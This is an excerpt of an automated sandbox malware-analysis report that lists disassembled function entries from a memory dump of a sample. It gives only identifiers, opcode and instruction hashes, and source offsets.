                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                    • Instruction ID: 8774e5d6c11751dd728355f2a67d7ffb1a61ddd625fd2e110a460c20b7f05925
                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                    • Instruction Fuzzy Hash: 60919371E4021E9BDB18CF69C881AAFB7F5EF44760F104E2EE955E72D1DB30AA428750
                                                                    Function 28FD9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2132668058.0000000028FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 28FA0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_28fa0000_uzonfntK.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $$@
                                                                    • API String ID: 0-1194432280
                                                                    • Opcode ID: 07b2d7d86670e6b8c86f434b0508221333e29dbfefc9d6f0457ee8c1b6c358e1
                                                                    • Instruction ID: a9fa64c64ec987af761f015e7582f3b635dd2e17e79d2558ad7aada520e331cc
                                                                    • Opcode Fuzzy Hash: 07b2d7d86670e6b8c86f434b0508221333e29dbfefc9d6f0457ee8c1b6c358e1
                                                                    • Instruction Fuzzy Hash: 08814C76D0126D9BDB25CF94CC44BDEB7B5AF08750F0445EAAA19B7280E7305E81CFA4